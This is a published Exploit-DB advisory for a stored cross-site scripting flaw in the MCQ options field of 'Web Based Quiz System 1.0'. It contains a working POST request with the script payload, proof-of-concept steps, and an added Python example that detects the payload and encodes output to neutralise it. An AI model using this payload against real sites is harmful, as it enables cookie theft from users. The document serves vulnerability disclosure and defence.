Web Based Quiz System 1.0 – ‘MCQ options’ Persistent Cross-Site Scripting

  • Author: Praharsh Kumar Singh
  • Date: 2021-03-02
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/49605/
    # Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
    # Date: 2021-03-02
    # Exploit Author: Praharsh Kumar Singh
    # Vendor Homepage: https://www.sourcecodester.com
    # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
    # Software: Web Based Quiz System
    # Version: 1.0
    # Vulnerability Type: Cross-site Scripting
    # Vulnerability: Persistent/Stored XSS
    # Tested on: Parrot OS
     
    # Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe:
    # the 'options' parameter used when adding questions is affected by this vulnerability.
    # payload: </script><script >alert(document.cookie)</script>
     
    POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 101
    Origin: http://localhost
    DNT: 1
    Connection: close
    Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
    Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
    Upgrade-Insecure-Requests: 1
    Sec-GPC: 1
    
    qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
     
    POC:
    # go to the url http://localhost:8080/admin.php
    # log in and add a question
    # then put the above payload in the MCQ options parameter
    # then fill in the remaining details
    # then click add
    # go to the url http://localhost:8080/login.php
    # then log in to a user account
    # then attempt the quiz; while attempting the quiz the XSS pops up there..!
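    The following is an added defender-side example, not code from the advisory or from the quiz system itself. It decodes the POST body shown above, flags which option field carries a script tag, and shows how context-aware output encoding (HTML entities for markup, a JSON string literal with `<`/`>` hex-escaped for an inline script block) renders the stored value inert. The field names and the render helpers are assumptions for illustration.

```python
import html
import json
import re
from urllib.parse import parse_qs

# Constructed from the request body in the advisory: option field "13" carries
# the stored-XSS payload, the other fields are benign sample values.
POST_BODY = ("qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29"
             "%3C%2Fscript%3E&14=1&ans1=c")

# Matches an opening or closing <script tag, tolerant of whitespace and case.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def decode_options(body: str) -> dict:
    """URL-decode the form body and return the MCQ option fields (numeric names, assumed)."""
    fields = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items() if name.isdigit()}


def flag_suspicious(options: dict) -> list:
    """Return the option field names whose decoded value contains a script tag.

    Useful for request logging or WAF-style alerting; it is not a substitute
    for output encoding, which is what actually prevents the XSS."""
    return [name for name, value in options.items() if SCRIPT_TAG.search(value)]


def render_html(value: str) -> str:
    """HTML context: entity-encode the stored option before placing it in markup."""
    return "<label>" + html.escape(value, quote=True) + "</label>"


def render_js(value: str) -> str:
    """JavaScript context: emit the option as a JSON string literal with < and >
    hex-escaped, so a stored </script> can never close the enclosing script block.
    This is the case the advisory's payload targets with its leading </script>."""
    literal = json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>var opt = " + literal + ";</script>"


def count_script_tags(markup: str) -> int:
    """Number of raw <script / </script tags present in rendered output."""
    return len(SCRIPT_TAG.findall(markup))


if __name__ == "__main__":
    opts = decode_options(POST_BODY)
    print("flagged fields:", flag_suspicious(opts))
    print(render_html(opts["13"]))
    print(render_js(opts["13"]))
```

    With the hardened renderers the option text (including `alert(document.cookie)`) is still stored and displayed verbatim, but the browser never sees a second script block.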